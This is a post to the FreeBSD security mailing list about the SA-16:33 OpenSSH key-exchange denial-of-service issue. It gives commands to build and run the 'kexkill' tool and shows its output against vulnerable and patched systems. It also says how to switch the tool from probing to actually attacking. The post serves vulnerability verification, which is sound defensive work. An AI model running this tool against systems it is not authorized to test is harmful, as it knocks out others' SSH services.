Xin LI <delp...@gmail.com> writes: > We will investigate if the statement is true and will issue patches > for earlier FreeBSD releases, if they are confirmed to be affected.
Hoping to make your life a little easier: $ git clone https://github.com/dag-erling/kexkill $ cd kexkill $ ./autogen.sh && ./configure && make vulnerable 12.0 system: $ ./src/kexkill -v -n1 target |& grep -v "sending kexinit" kexkill: [03] connected kexkill: [03] got banner: SSH-2.0-OpenSSH_7.2 FreeBSD-20160310 kexkill: [03] sending banner kexkill: [03] received kexinit [no more output] ^C same system after applying SA-16:33: $ ./src/kexkill -v -n1 target |& grep -v "sending kexinit" kexkill: [03] connected kexkill: [03] got banner: SSH-2.0-OpenSSH_7.2 FreeBSD-20160310 kexkill: [03] sending banner kexkill: [03] received kexinit kexkill: [03] read(): Connection reset by peer kexkill: [03] connected kexkill: [03] got banner: SSH-2.0-OpenSSH_7.2 FreeBSD-20160310 kexkill: [03] sending banner kexkill: [03] received kexinit kexkill: [03] write(): Broken pipe kexkill: [03] connected kexkill: [03] got banner: SSH-2.0-OpenSSH_7.2 FreeBSD-20160310 kexkill: [03] sending banner kexkill: [03] received kexinit kexkill: [03] read(): Connection reset by peer [...] ^C Remove -n1 to actually (attempt to) attack the system rather than just probe it. DES -- Dag-Erling Smørgrav - d...@des.no _______________________________________________ freebsd-security@freebsd.org mailing list https://lists.freebsd.org/mailman/listinfo/freebsd-security To unsubscribe, send any mail to "freebsd-security-unsubscr...@freebsd.org"
